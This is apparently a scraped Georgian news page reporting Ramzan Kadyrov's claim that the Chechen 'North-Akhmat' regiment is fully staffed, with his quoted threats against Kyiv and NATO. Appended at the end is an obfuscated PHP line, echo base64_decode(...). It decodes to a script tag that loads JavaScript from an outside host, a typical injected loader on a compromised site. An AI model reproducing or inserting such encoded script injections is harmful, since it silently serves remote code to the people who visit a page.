celsiusi
ავერსი საქკაბელი
ჩეჩნეთის მეთაურის, რამზან კადიროვის მტკიცებით, მან დაკომპლექტებულად გამოაცხადა „რუსეთის თავდაცვის სამინისტროსთან შექმნილი სპეციალური დანიშნულების პოლკი ჩრდილოეთი-ახმატი“.
 
ამის შესახებ კადიროვმა ტელეგრამ-არხზე დაწერა. მისივე თქმით, პოლკის შემადგენლობაში არიან მეომრები, რომლებმაც საბრძოლო გამოცდილება მიიღეს სირიასა და უკრაინაში.
 
„ჩვენ ისევ მზად ვართ ბრძანების შესაბამისად წინ წავიდეთ, იოლად ავიღოთ კიევი და ნატოს ქვეყნები. ნამდვილ ბრძოლებში გამობრძმედილ ჩვენს ქვედანაყოფებს წინააღმდეგობას ვერ გაუწევს მსოფლიოს ვერანაირი არმია“, - აცხადებს კადიროვი. ის წერს, რომ მათი სიძლიერე „დასავლეთს ჯერ კიდევ არ ესმის“, თუმცა, არ ამბობს, ნატოს კონკრეტულად რომელი სახელმწიფოების აღება უნდა.
 
ჩეჩნეთის მეთაურის თანახმად, დღეს რუსეთის გარდა არავის შეუძლია წინააღმდეგობა გაუწიოს იმ „ჯოჯოხეთურ სისაძაგლეს, რომელსაც დასავლეთი ავრცელებს“ და მხოლოდ რუსეთის პრეზიდენტის ბრძანება იქნება საკმარისი იმისთვის, რომ „გააცამტვერონ დასავლეთის სახელმწიფოების ცრუ-დემოკრატიული, ფსევდო-ლიბერალური და სამხედრო-ბარბაროსული კამპანია".
 
ცნობისთვის კადიროვმა გასული თვის ბოლოს დააანონსა, რომ ქმნის მამის, ახმატ კადიროვის სახელობის ახალ ჩეჩნურ ბატალიონებს: ჩრდილოეთი-ახმატი, სამხრეთი-ახმატი, დასავლეთი-ახმატი და აღმოსავლეთი-ახმატი, რომლებიც რუსეთის თავდაცვის სამინისტროს ჯარების შემადგენლობას შეავსებენ.
622
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");